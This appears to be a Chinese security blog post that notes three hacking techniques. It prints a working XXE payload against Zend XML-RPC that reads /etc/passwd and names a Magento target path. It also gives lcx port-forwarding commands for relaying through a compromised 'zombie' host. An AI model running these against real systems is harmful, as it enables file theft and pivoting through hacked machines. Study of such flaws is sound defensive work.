1.IIS短文件和文件夹泄漏漏洞
这个漏洞具体可以看核攻击大牛的blog:http://lcx.cc/?i=2643
我大概谈谈我的理解吧,由于历史遗留问题,在windows系统中会对长度超过8个字母的文件夹和后缀超过3个时,会生成一个对应的8.3格式的短文件,而这个文件则是可以通过*和~来进行通配预测的,具体类似于sql盲注,
有人写了个java板的利用工具,但是实际使用中你会发现,你只能预测到前六个字母类似于upload~1.asp这种,实际危害还是比较有限的。
2.zend xml rpc本地文件读取漏洞
这个漏洞具体可以看:http://zone.wooyun.org/content/531
这个也是比较有意思的
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" >]>
<methodCall>
<methodName>
&xxe;
</methodName>
</methodCall>
其中的xxe是比较关键的 以及后面的那个
xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"
但在实际中我没能找到例子来实验,
不过根据我的分析在mageoto中应该采用了这个zend 模块,具体的路径是
lib/Zend/XmlRpc/Server.php
大家可以自行实验,
3.试验了下lcx端口转发,第一次用留个纪念
lcx.exe -slave 本人ip 端口a 肉鸡ip 端口b
lcx.exe -listen 端口a 端口c
分享到:
相关推荐
这一代学生生活在一个Windows 10甚至更高版本操作系统普及的时代,日常接触的软件也是更新颖的版本。在这样的背景下,如何让教材内容与学生的实际需求和兴趣相匹配,成为了一个迫在眉睫的问题。 为了解决这一难题,...
在技术博客和技术随笔等文档中,作者们可能会分享他们在使用Comsol软件进行电磁轨道炮仿真时的心得体会,包括建模技巧、仿真遇到的问题及解决方案等。这些内容对于电磁轨道炮的研究人员和工程师来说,是非常有价值的...
网络教研的优势主要体现在以下几个方面: 1. 查阅资料的便利性:网络教研为教师提供了快捷方便的资料检索与下载途径,使教师能够迅速获取教学所需的课件、教学设计等资源,有效提升教学效率。 2. 交流合作和分享...
根据给定文件的信息,我们可以提炼出以下几个主要的知识点: ### 1. 阅读的重要性 - **定义**: 阅读是一种通过视觉感知文字,理解其含义,并从中获取信息和知识的过程。 - **作用**: 提高个人素养,增强语言表达...
如前所述,我是一个狮子座男人,一度我认为学习Java会使我看起来与众不同,可是几个月以后我放弃了这个选择,我看了论坛里关于这两种语言孰优孰劣的讨论,最终选择了C#,请不要问我为何做出这样的选择,很多人认为...